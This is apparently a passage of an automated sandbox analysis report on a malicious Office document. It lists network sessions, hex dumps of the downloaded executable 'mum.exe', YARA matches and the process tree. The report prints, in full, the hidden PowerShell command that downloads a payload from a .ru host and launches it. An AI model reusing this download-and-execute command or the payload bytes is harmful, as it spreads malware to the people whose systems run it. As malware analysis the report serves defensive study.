                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: f0705964.xsph.ru
                                    Connection: Keep-Alive
                                    Aug 23, 2022 13:42:48.425309896 CEST2INHTTP/1.1 200 OK
                                    Server: openresty
                                    Date: Tue, 23 Aug 2022 11:42:48 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 829952
                                    Last-Modified: Mon, 22 Aug 2022 22:52:30 GMT
                                    Connection: keep-alive
                                    ETag: "630408ae-caa00"
                                    Expires: Tue, 30 Aug 2022 11:42:48 GMT
                                    Cache-Control: max-age=604800
                                    Accept-Ranges: bytes
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 6b 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14 7d 08 00 00 04 16 0a de 07 02 28 02 00 00 06 dc 06 2a 01 10 00 00 04 00 00 00 f3 f3 00 07 00 00 00 00 6e 02 15 7d 01 00 00 04 02 7b 08 00 00 04 2c 0b 02 7b 08 00 00 04 6f 54 00 00 06 2a 1e 02 7b 02 00 00 04 2a 1a 73 19 00 00 0a 7a 00 32 02 7b 02 00 00 04 8c
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc @ @W\ H.text `.rsrc\@@.reloc@BH9S`&z(}(o}*0{.3(*0{,.f}}}so}}8{o}{}}}{Y}{-+H{{X{X ;|{Xa}}{ok:q(+(}(*n}{,{oT*{*sz2{
                                    Aug 23, 2022 13:42:48.425352097 CEST3INData Raw: 2f 00 00 01 2a 00 00 00 13 30 02 00 3c 00 00 00 03 00 00 11 02 7b 01 00 00 04 1f fe 33 1d 02 7b 03 00 00 04 28 17 00 00 0a 6f 18 00 00 0a 33 0b 02 16 7d 01 00 00 04 02 0a 2b 07 16 73 01 00 00 06 0a 06 02 7b 05 00 00 04 7d 04 00 00 04 06 2a 1e 02
                                    Data Ascii: /*0<{3{(o3}+s{}*(*z(}(o}**0`{,.%*}}{}}*}{{X}{@3}+{*s
                                    Aug 23, 2022 13:42:48.425389051 CEST4INData Raw: 06 18 58 13 05 06 6f 48 00 00 06 18 59 13 06 06 6f 48 00 00 06 17 58 13 07 06 6f 48 00 00 06 17 59 13 08 07 15 31 30 11 07 15 31 2b 07 02 7b 19 00 00 04 2f 22 11 07 02 7b 19 00 00 04 2f 18 02 7b 16 00 00 04 07 11 07 28 21 00 00 0a 7b 2a 00 00 04
                                    Data Ascii: XoHYoHXoHY101+{/"{/{(!{*+,(101+{/"{/{(!{*+,(101+{/"{/{(!{*+,(10
                                    Aug 23, 2022 13:42:48.425430059 CEST6INData Raw: 00 00 0a 26 02 06 7b 2f 00 00 04 28 1c 00 00 06 2a 00 00 00 03 30 02 00 49 00 00 00 00 00 00 00 02 16 7d 18 00 00 04 02 7b 15 00 00 04 6f 24 00 00 0a 6f 39 00 00 0a 02 14 7d 16 00 00 04 02 7b 1b 00 00 04 20 43 5d 11 41 28 96 00 00 06 6f 2f 00 00
                                    Data Ascii: &{/(*0I}{o$o9}{ C]A(o/{ C]A(o/*n} }#(:(-*Vs;!s;"*02o<s;{ ,!{ } {~o+{~
                                    Aug 23, 2022 13:42:48.425468922 CEST7INData Raw: 04 16 6f 52 00 00 0a 6f 5f 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 61 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 2a 00 00 00 13 30 02 00 26 00 00 00 10 00 00 11 03 2c 0b 02 7b 23 00 00 04 14 fe 03
                                    Data Ascii: oRo_~!oRoa~!oRocs^oA*0&,{#+,{#oC(S*0sT}#{#sU}$(V{$2oW{$(sXoY"@"PAsZ([(\(] s^
                                    Aug 23, 2022 13:42:48.425508022 CEST9INData Raw: 01 0a 06 17 20 21 2c 7d df 66 65 66 66 65 66 65 66 65 9e 06 16 20 16 d1 d5 c2 66 66 65 66 65 65 66 66 65 9e 06 18 20 65 ac 21 87 66 66 65 65 66 66 65 66 65 9e 06 19 20 1d 3b cf 75 66 66 65 65 66 66 65 66 65 9e 20 44 86 c8 61 66 65 66 66 65 65 66
                                    Data Ascii: !,}feffefefe ffefeeffe e!ffeeffefe ;uffeeffefe Dafeffeefefi ci+6bcaX_XaXXbcaXc_XaXX 3+X3}&}'*(*0e(p(2(p
                                    Aug 23, 2022 13:42:48.425545931 CEST10INData Raw: 00 0a 1f 3c 58 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 38 b5 00 00 00 02 06 6f 5f 00 00 06 0b 12 01 28 28 00 00 0a 06 6f 5f 00 00 06 0b 12 01 28 2a 00 00 0a 1f 3c 59 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f
                                    Data Ascii: <Xsoaocs^oA8o_((o_(*<Ysoaocs^oA+xo_((<Xo_(*soaocs^oA+;o_((<Yo_(*soaocs^oA+*0
                                    Aug 23, 2022 13:42:48.425584078 CEST12INData Raw: 5e 00 00 0a 6f 97 00 00 0a 02 7b 34 00 00 04 1b 6f 98 00 00 0a 02 7b 34 00 00 04 20 e2 5f 11 41 28 96 00 00 06 6f 2f 00 00 0a 02 7b 34 00 00 04 17 6f 99 00 00 0a 02 7b 34 00 00 04 02 fe 06 57 00 00 06 73 58 00 00 0a 6f 9a 00 00 0a 02 7b 35 00 00
                                    Data Ascii: ^o{4o{4 _A(o/{4o{4WsXo{5=so{5 _A(od{5+s^o{5o{5 _A(o/{5o{5WsXo{6nso{6 _A(od
                                    Aug 23, 2022 13:42:48.425621986 CEST13INData Raw: 06 7d 3a 00 00 04 2b 25 02 28 7b 00 00 06 7d 3a 00 00 04 2b 18 02 28 7d 00 00 06 7d 3a 00 00 04 2b 0b 02 28 7f 00 00 06 7d 3a 00 00 04 2a 13 30 02 00 54 00 00 00 22 00 00 11 02 7b 3c 00 00 04 0b 07 0a 06 45 04 00 00 00 1c 00 00 00 29 00 00 00 02
                                    Data Ascii: }:+%({}:+(}}:+(}:*0T"{<E)+'(z}:+%(w}:+(x}:+(y}:*0#(cE6P+N|9%(*(aY(++L|9%(*(aX(++2|9
                                    Aug 23, 2022 13:42:48.425657988 CEST14INData Raw: 41 19 19 20 a2 00 00 00 73 b5 00 00 0a 6f b6 00 00 0a 02 7b 47 00 00 04 28 b8 00 00 0a 6f b9 00 00 0a 02 7b 47 00 00 04 20 be 01 00 00 1f fc 73 1d 00 00 0a 6f 1e 00 00 0a 02 7b 47 00 00 04 20 08 5e 11 41 28 96 00 00 06 6f 64 00 00 0a 02 7b 47 00
                                    Data Ascii: A so{G(o{G so{G ^A(od{Gso{Gs^o{Go{G C]A(o/{Do{D(-o#{D ^A("A so{D(fo{D^s
                                    Aug 23, 2022 13:42:48.486007929 CEST16INData Raw: 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00 27 00 00 11 28 74 00 00 06 20 22 58 11 41 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00
                                    Data Ascii: (~Lot*0#'(t "XA(~Lot*0#'(t WXA(~Lot*0#'(t \XA(~Lot*0#'(t AXA(~Lot*0#'(t vXA(


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.2249172141.8.192.15180C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    TimestampkBytes transferredDirectionData
                                    Aug 23, 2022 13:42:52.403650045 CEST882OUTGET /mum.exe HTTP/1.1
                                    Host: f0705964.xsph.ru
                                    Connection: Keep-Alive
                                    Aug 23, 2022 13:42:52.464385033 CEST884INHTTP/1.1 200 OK
                                    Server: openresty
                                    Date: Tue, 23 Aug 2022 11:42:52 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 829952
                                    Last-Modified: Mon, 22 Aug 2022 22:52:30 GMT
                                    Connection: keep-alive
                                    ETag: "630408ae-caa00"
                                    Expires: Tue, 30 Aug 2022 11:42:52 GMT
                                    Cache-Control: max-age=604800
                                    Accept-Ranges: bytes
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 6b 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14 7d 08 00 00 04 16 0a de 07 02 28 02 00 00 06 dc 06 2a 01 10 00 00 04 00 00 00 f3 f3 00 07 00 00 00 00 6e 02 15 7d 01 00 00 04 02 7b 08 00 00 04 2c 0b 02 7b 08 00 00 04 6f 54 00 00 06 2a 1e 02 7b 02 00 00 04 2a 1a 73 19 00 00 0a 7a 00 32 02 7b 02 00 00 04 8c
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc @ @W\ H.text `.rsrc\@@.reloc@BH9S`&z(}(o}*0{.3(*0{,.f}}}so}}8{o}{}}}{Y}{-+H{{X{X ;|{Xa}}{ok:q(+(}(*n}{,{oT*{*sz2{
                                    Aug 23, 2022 13:42:52.464473009 CEST885INData Raw: 2f 00 00 01 2a 00 00 00 13 30 02 00 3c 00 00 00 03 00 00 11 02 7b 01 00 00 04 1f fe 33 1d 02 7b 03 00 00 04 28 17 00 00 0a 6f 18 00 00 0a 33 0b 02 16 7d 01 00 00 04 02 0a 2b 07 16 73 01 00 00 06 0a 06 02 7b 05 00 00 04 7d 04 00 00 04 06 2a 1e 02
                                    Data Ascii: /*0<{3{(o3}+s{}*(*z(}(o}**0`{,.%*}}{}}*}{{X}{@3}+{*s
                                    Aug 23, 2022 13:42:52.464493990 CEST887INData Raw: 06 18 58 13 05 06 6f 48 00 00 06 18 59 13 06 06 6f 48 00 00 06 17 58 13 07 06 6f 48 00 00 06 17 59 13 08 07 15 31 30 11 07 15 31 2b 07 02 7b 19 00 00 04 2f 22 11 07 02 7b 19 00 00 04 2f 18 02 7b 16 00 00 04 07 11 07 28 21 00 00 0a 7b 2a 00 00 04
                                    Data Ascii: XoHYoHXoHY101+{/"{/{(!{*+,(101+{/"{/{(!{*+,(101+{/"{/{(!{*+,(10
                                    Aug 23, 2022 13:42:52.464514017 CEST888INData Raw: 00 00 0a 26 02 06 7b 2f 00 00 04 28 1c 00 00 06 2a 00 00 00 03 30 02 00 49 00 00 00 00 00 00 00 02 16 7d 18 00 00 04 02 7b 15 00 00 04 6f 24 00 00 0a 6f 39 00 00 0a 02 14 7d 16 00 00 04 02 7b 1b 00 00 04 20 43 5d 11 41 28 96 00 00 06 6f 2f 00 00
                                    Data Ascii: &{/(*0I}{o$o9}{ C]A(o/{ C]A(o/*n} }#(:(-*Vs;!s;"*02o<s;{ ,!{ } {~o+{~
                                    Aug 23, 2022 13:42:52.464533091 CEST889INData Raw: 04 16 6f 52 00 00 0a 6f 5f 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 61 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 2a 00 00 00 13 30 02 00 26 00 00 00 10 00 00 11 03 2c 0b 02 7b 23 00 00 04 14 fe 03
                                    Data Ascii: oRo_~!oRoa~!oRocs^oA*0&,{#+,{#oC(S*0sT}#{#sU}$(V{$2oW{$(sXoY"@"PAsZ([(\(] s^
                                    Aug 23, 2022 13:42:52.464554071 CEST891INData Raw: 01 0a 06 17 20 21 2c 7d df 66 65 66 66 65 66 65 66 65 9e 06 16 20 16 d1 d5 c2 66 66 65 66 65 65 66 66 65 9e 06 18 20 65 ac 21 87 66 66 65 65 66 66 65 66 65 9e 06 19 20 1d 3b cf 75 66 66 65 65 66 66 65 66 65 9e 20 44 86 c8 61 66 65 66 66 65 65 66
                                    Data Ascii: !,}feffefefe ffefeeffe e!ffeeffefe ;uffeeffefe Dafeffeefefi ci+6bcaX_XaXXbcaXc_XaXX 3+X3}&}'*(*0e(p(2(p
                                    Aug 23, 2022 13:42:52.464572906 CEST892INData Raw: 00 0a 1f 3c 58 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 38 b5 00 00 00 02 06 6f 5f 00 00 06 0b 12 01 28 28 00 00 0a 06 6f 5f 00 00 06 0b 12 01 28 2a 00 00 0a 1f 3c 59 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f
                                    Data Ascii: <Xsoaocs^oA8o_((o_(*<Ysoaocs^oA+xo_((<Xo_(*soaocs^oA+;o_((<Yo_(*soaocs^oA+*0
                                    Aug 23, 2022 13:42:52.464591026 CEST893INData Raw: 5e 00 00 0a 6f 97 00 00 0a 02 7b 34 00 00 04 1b 6f 98 00 00 0a 02 7b 34 00 00 04 20 e2 5f 11 41 28 96 00 00 06 6f 2f 00 00 0a 02 7b 34 00 00 04 17 6f 99 00 00 0a 02 7b 34 00 00 04 02 fe 06 57 00 00 06 73 58 00 00 0a 6f 9a 00 00 0a 02 7b 35 00 00
                                    Data Ascii: ^o{4o{4 _A(o/{4o{4WsXo{5=so{5 _A(od{5+s^o{5o{5 _A(o/{5o{5WsXo{6nso{6 _A(od
                                    Aug 23, 2022 13:42:52.464608908 CEST895INData Raw: 06 7d 3a 00 00 04 2b 25 02 28 7b 00 00 06 7d 3a 00 00 04 2b 18 02 28 7d 00 00 06 7d 3a 00 00 04 2b 0b 02 28 7f 00 00 06 7d 3a 00 00 04 2a 13 30 02 00 54 00 00 00 22 00 00 11 02 7b 3c 00 00 04 0b 07 0a 06 45 04 00 00 00 1c 00 00 00 29 00 00 00 02
                                    Data Ascii: }:+%({}:+(}}:+(}:*0T"{<E)+'(z}:+%(w}:+(x}:+(y}:*0#(cE6P+N|9%(*(aY(++L|9%(*(aX(++2|9
                                    Aug 23, 2022 13:42:52.464621067 CEST896INData Raw: 41 19 19 20 a2 00 00 00 73 b5 00 00 0a 6f b6 00 00 0a 02 7b 47 00 00 04 28 b8 00 00 0a 6f b9 00 00 0a 02 7b 47 00 00 04 20 be 01 00 00 1f fc 73 1d 00 00 0a 6f 1e 00 00 0a 02 7b 47 00 00 04 20 08 5e 11 41 28 96 00 00 06 6f 64 00 00 0a 02 7b 47 00
                                    Data Ascii: A so{G(o{G so{G ^A(od{Gso{Gs^o{Go{G C]A(o/{Do{D(-o#{D ^A("A so{D(fo{D^s
                                    Aug 23, 2022 13:42:52.524490118 CEST898INData Raw: 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00 27 00 00 11 28 74 00 00 06 20 22 58 11 41 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00
                                    Data Ascii: (~Lot*0#'(t "XA(~Lot*0#'(t WXA(~Lot*0#'(t \XA(~Lot*0#'(t AXA(~Lot*0#'(t vXA(


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.2249173132.226.8.16980C:\Users\user\AppData\Roaming\mum.exe
                                    TimestampkBytes transferredDirectionData
                                    Aug 23, 2022 13:43:14.345360994 CEST1745OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 23, 2022 13:43:14.637011051 CEST1745INHTTP/1.1 200 OK
                                    Date: Tue, 23 Aug 2022 11:43:14 GMT
                                    Content-Type: text/html
                                    Content-Length: 102
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.7</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.2249174193.122.130.080C:\Users\user\AppData\Roaming\mum.exe
                                    TimestampkBytes transferredDirectionData
                                    Aug 23, 2022 13:43:29.255486965 CEST1747OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 23, 2022 13:43:29.372759104 CEST1747INHTTP/1.1 200 OK
                                    Date: Tue, 23 Aug 2022 11:43:29 GMT
                                    Content-Type: text/html
                                    Content-Length: 102
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.7</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.2249175193.122.130.080C:\Users\user\AppData\Roaming\mum.exe
                                    TimestampkBytes transferredDirectionData
                                    Aug 23, 2022 13:43:56.802113056 CEST1748OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 23, 2022 13:43:56.912651062 CEST1748INHTTP/1.1 200 OK
                                    Date: Tue, 23 Aug 2022 11:43:56 GMT
                                    Content-Type: text/html
                                    Content-Length: 102
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.7</body></html>


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:13:42:14
                                    Start date:23/08/2022
                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                    Imagebase:0x13f410000
                                    File size:1423704 bytes
                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:4
                                    Start time:13:42:20
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
                                    Imagebase:0x13f720000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.914867466.00000000001FF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.915030344.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    Reputation:high

                                    Target ID:6
                                    Start time:13:42:28
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x4acb0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:8
                                    Start time:13:42:29
                                    Start date:23/08/2022
                                    Path:C:\Users\user\AppData\Roaming\mum.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x11b0000
                                    File size:829952 bytes
                                    MD5 hash:06C16E9A1807F8754D73C6B77E978D02
                                    Has elevated privileges:true
                                    Has administrator privileges:true
